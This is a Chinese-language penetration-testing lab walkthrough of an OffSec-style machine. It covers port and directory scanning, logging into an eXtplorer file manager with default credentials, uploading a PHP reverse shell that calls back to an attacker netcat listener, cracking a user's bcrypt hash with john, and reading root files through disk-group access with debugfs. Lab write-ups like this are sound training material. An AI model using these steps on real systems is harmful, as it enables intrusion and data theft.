主要知识点
- 利用弱密码上传shell
- 挂载目录提权
具体步骤
执行nmap扫描,发现80/22端口开放
Nmap scan report for #remote_ip#
Host is up (0.00096s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (91%)
继续执行nikto扫描80端口,好像安装了wordpress,不过调查一下之后发现,wordpress并不能带来多大价值,不过也可以利用wpscan扫描一下。
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: #remote_ip#
+ Target Hostname: #remote_ip#
+ Target Port: 80
+ Start Time: 2024-09-22 11:20:08 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://192.168.51.16/wp-admin/setup-config.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /license.txt: License file found may identify site software.
+ /wordpress/: Directory indexing found.
+ 8104 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-09-22 11:20:20 (GMT0) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
执行路径爆破,可以利用dirsearch,dirb,gobuster等,这里选择dirsearch,发现filemanager路径暴露
C:\home\kali\Documents\OFFSEC\GoToWork\Extplorer> dirsearch -u #remote_ip# -w /usr/share/wordlists/dirb/big.txt -x 404,502
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 20469
Output File: /home/kali/Documents/OFFSEC/GoToWork/Extplorer/reports/_192.168.162.16/_24-09-22_09-34-11.txt
Target: http://#remote_ip#/
[09:34:17] Starting:
[09:39:24] 301 - 322B - /filemanager -> http://192.168.162.16/filemanager/
访问得到如下,google一下发现extplorer的默认credential为admin/admin,尝试一下,登陆成功,并且有写权限
本地执行nc -nlvp 9000
更改本地/usr/share/webshells/php/php-reverse-shell.php 中的ip和port为local server的ip和9000端口,并在http://#remote_ip#/filemanager/下创建shell.php文件,并粘贴/usr/share/webshells/php/php-reverse-shell.php内容
访问http://#remote_ip#/filemanager/shell.php,reverse shell创建成功
尝试linpeas,sudo -l,等方法查看,除了/home/dora用户外,没有其他线索(sudo 版本为1.8.31,看起来是vulnerable version,但尝试了几个exp,均没能成功),继续观察filemanager中的文件,发现filemanager/config/.htuser.php中有疑似dora的密码
复制下来并尝试解密,得到doraemon
C:\home\kali\Documents\OFFSEC\GoToWork\Extplorer> john dora.passwd --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 256 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
doraemon (?)
1g 0:00:00:02 DONE (2024-09-22 09:12) 0.3436g/s 519.5p/s 519.5c/s 519.5C/s gonzalez..something
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
利用得到的密码在reverse shell中执行su dora
C:\home\kali\Documents\OFFSEC\GoToWork\Extplorer> nc -nlvp 9000
listening on [any] 9000 ...
connect to [192.168.45.223] from (UNKNOWN) [#remote_ip#] 60672
Linux dora 5.4.0-146-generic #163-Ubuntu SMP Fri Mar 17 18:26:02 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
13:29:10 up 2:07, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ su dora
Password: doraemon
id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)
发现 dora属于 disk group,根据Interesting Groups - Linux Privesc | HackTricks中描述的方法,获取root权限
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 5.1G 4.2G 55% /
udev 947M 0 947M 0% /dev
tmpfs 992M 0 992M 0% /dev/shm
tmpfs 199M 1.2M 198M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1611
/dev/loop2 50M 50M 0 100% /snap/snapd/18596
/dev/loop1 64M 64M 0 100% /snap/core20/1852
/dev/loop3 92M 92M 0 100% /snap/lxd/24061
/dev/loop4 68M 68M 0 100% /snap/lxd/22753
/dev/sda2 1.7G 209M 1.4G 13% /boot
tmpfs 199M 0 199M 0% /run/user/1000
debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: cd /root
cd /root
debugfs: ls
ls
131076 (12) . 2 (12) .. 265478 (12) .ssh 265574 (12) snap
131077 (16) .bashrc 131078 (16) .profile 142303 (24) .bash_history
265709 (16) .cache 265469 (36) .local 132363 (20) proof.txt
132531 (3908) flag4.txt
debugfs: cat proof.txt
cat proof.txt
7f9f1d41e70748253c122cf12930d1a9